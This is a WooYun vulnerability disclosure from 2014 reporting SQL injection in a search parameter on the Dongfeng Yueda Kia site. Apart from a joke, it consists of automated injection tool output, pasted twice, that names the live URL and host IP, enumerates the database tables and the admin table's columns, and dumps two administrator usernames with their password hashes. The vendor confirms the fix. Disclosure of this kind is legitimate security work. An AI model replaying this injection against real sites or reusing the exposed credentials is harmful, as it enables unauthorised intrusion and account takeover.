漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-081552
漏洞标题:东风悦达起亚某站点SQL注入
相关厂商:dyk.com.cn
漏洞作者: CtrlH
提交时间:2014-11-03 11:13
修复时间:2014-12-18 11:16
公开时间:2014-12-18 11:16
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-03: 细节已通知厂商并且等待厂商处理中
2014-11-07: 厂商已经确认,细节仅向厂商公开
2014-11-17: 细节向核心白帽子及相关领域专家公开
2014-11-27: 细节向普通白帽子公开
2014-12-07: 细节向实习白帽子公开
2014-12-18: 细节向公众公开
简要描述:
今天单位消防知识讲座,消防支队的人说前些日子去救火,一个女的最后关头抱着个电脑冲了出来。
消防员很生气问她:你不要命了,钱重要命重要。命都没了要电脑干什么。
女人很委屈说自己是公司会计,电脑里很多数据很重要。
消防员一听更急了:尼玛有点常识好不好,数据重要你抱主机啊,你TM抱个显示器干啥!
详细说明:
URL:http://www.dyk.com.cn/search?q=K3&t=1 q=K3
Analyzing http://www.dyk.com.cn/search?q=K3&t=1 q=K3 with 2 input parameter(s)
Test parameter: t
Host IP: 219.145.171.61
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.3.27
Keyword Found: 2014-10-31
Injection type is String (')
DB Server: MySQL >=5
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Current DB: dyk_dyk
MySQL error based injection method can be used!
Count(table_name) of information_schema.tables where table_schema=0x64796B5F64796B is 32
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x64796B5F64796B is 32
Bypassing illegal union failed! Turning off this feature
Table found: ci_addonarticle
Table found: ci_admin_node
Table found: ci_admin_role
Table found: ci_captcha
Table found: ci_admin
Table found: ci_arcatt
Table found: ci_arctype
Table found: ci_attachment
Table found: ci_arctiny
Table found: ci_archives
Table found: ci_cartype
Table found: ci_citys
Table found: ci_common_cache
Table found: ci_channeltype
Table found: ci_member
Table found: ci_login_log
Table found: ci_log
Table found: ci_member_car
Table found: ci_member_qq
Table found: ci_member_msg
Table found: ci_search_keyword
Table found: ci_provinces
Table found: ci_search
Table found: ci_menu
Table found: ci_sendmsg_log
Table found: ci_sessions
Table found: ci_stepselect
Table found: ci_sys_enum
Table found: ci_serviceplan
Table found: ci_member_sinaweibo
Table found: ci_sysconfig
Table found: ci_table
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F6D656D6265725F73696E61776569626F is 8
Column found: id
Column found: updatetime
Column found: sina_id
Column found: name
Column found: addtime
Column found: headimg
Column found: uid
Column found: status
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F6164646F6E61727469636C65 is 3
Column found: aid
Column found: userip
Column found: body
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F61646D696E5F6E6F6465 is 8
Column found: id
Column found: reid
Column found: typeid
Column found: code
Column found: sort
Column found: is_check
Column found: description
Column found: name
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F61646D696E5F726F6C65 is 7
Column found: id
Column found: description
Column found: menuids
Column found: sort
Column found: name
Column found: nodeids
Column found: is_check
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F63617074636861 is 4
Column found: captcha_id
Column found: captcha_time
Column found: ip_address
Column found: word
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F61646D696E is 21
Column found: id
Column found: realname
Column found: email
Column found: msn
Column found: group_id
Column found: phone
Column found: qq
Column found: posts
Column found: mobile
Column found: name
Column found: pass
Column found: birthday
Column found: loginCount
Column found: createTime
Column found: question
Column found: lastLoginTime
Column found: cardid
Column found: lastLoginIp
Column found: modifyTime
Column found: answer
Column found: state
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F617263617474 is 3
Column found: sortid
Column found: att
Column found: attname
Count(*) of dyk_dyk.ci_admin is 2
Data Found: name,pass=admin^fd6ae85c115d21c784ac7f3a3d9606a9
Data Found: name,pass=dyk_admin^9c3782798090e60c81e5c5cc25c7225c
漏洞证明:
URL:http://www.dyk.com.cn/search?q=K3&t=1 q=K3
Analyzing http://www.dyk.com.cn/search?q=K3&t=1 q=K3 with 2 input parameter(s)
Test parameter: t
Host IP: 219.145.171.61
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.3.27
Keyword Found: 2014-10-31
Injection type is String (')
DB Server: MySQL >=5
Trying another method using keyword for finding columns count
Findig columns count for MySQL failed!
Current DB: dyk_dyk
MySQL error based injection method can be used!
Count(table_name) of information_schema.tables where table_schema=0x64796B5F64796B is 32
Can not get all tables by group_concat!
Count(table_name) of information_schema.tables where table_schema=0x64796B5F64796B is 32
Bypassing illegal union failed! Turning off this feature
Table found: ci_addonarticle
Table found: ci_admin_node
Table found: ci_admin_role
Table found: ci_captcha
Table found: ci_admin
Table found: ci_arcatt
Table found: ci_arctype
Table found: ci_attachment
Table found: ci_arctiny
Table found: ci_archives
Table found: ci_cartype
Table found: ci_citys
Table found: ci_common_cache
Table found: ci_channeltype
Table found: ci_member
Table found: ci_login_log
Table found: ci_log
Table found: ci_member_car
Table found: ci_member_qq
Table found: ci_member_msg
Table found: ci_search_keyword
Table found: ci_provinces
Table found: ci_search
Table found: ci_menu
Table found: ci_sendmsg_log
Table found: ci_sessions
Table found: ci_stepselect
Table found: ci_sys_enum
Table found: ci_serviceplan
Table found: ci_member_sinaweibo
Table found: ci_sysconfig
Table found: ci_table
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F6D656D6265725F73696E61776569626F is 8
Column found: id
Column found: updatetime
Column found: sina_id
Column found: name
Column found: addtime
Column found: headimg
Column found: uid
Column found: status
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F6164646F6E61727469636C65 is 3
Column found: aid
Column found: userip
Column found: body
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F61646D696E5F6E6F6465 is 8
Column found: id
Column found: reid
Column found: typeid
Column found: code
Column found: sort
Column found: is_check
Column found: description
Column found: name
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F61646D696E5F726F6C65 is 7
Column found: id
Column found: description
Column found: menuids
Column found: sort
Column found: name
Column found: nodeids
Column found: is_check
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F63617074636861 is 4
Column found: captcha_id
Column found: captcha_time
Column found: ip_address
Column found: word
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F61646D696E is 21
Column found: id
Column found: realname
Column found: email
Column found: msn
Column found: group_id
Column found: phone
Column found: qq
Column found: posts
Column found: mobile
Column found: name
Column found: pass
Column found: birthday
Column found: loginCount
Column found: createTime
Column found: question
Column found: lastLoginTime
Column found: cardid
Column found: lastLoginIp
Column found: modifyTime
Column found: answer
Column found: state
Count(column_name) of information_schema.columns where table_schema=0x64796B5F64796B and table_name=0x63695F617263617474 is 3
Column found: sortid
Column found: att
Column found: attname
Count(*) of dyk_dyk.ci_admin is 2
Data Found: name,pass=admin^fd6ae85c115d21c784ac7f3a3d9606a9
Data Found: name,pass=dyk_admin^9c3782798090e60c81e5c5cc25c7225c
修复方案:
版权声明:转载请注明来源 CtrlH@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-11-07 17:59
厂商回复:
已修复,多谢。
最新状态:
暂无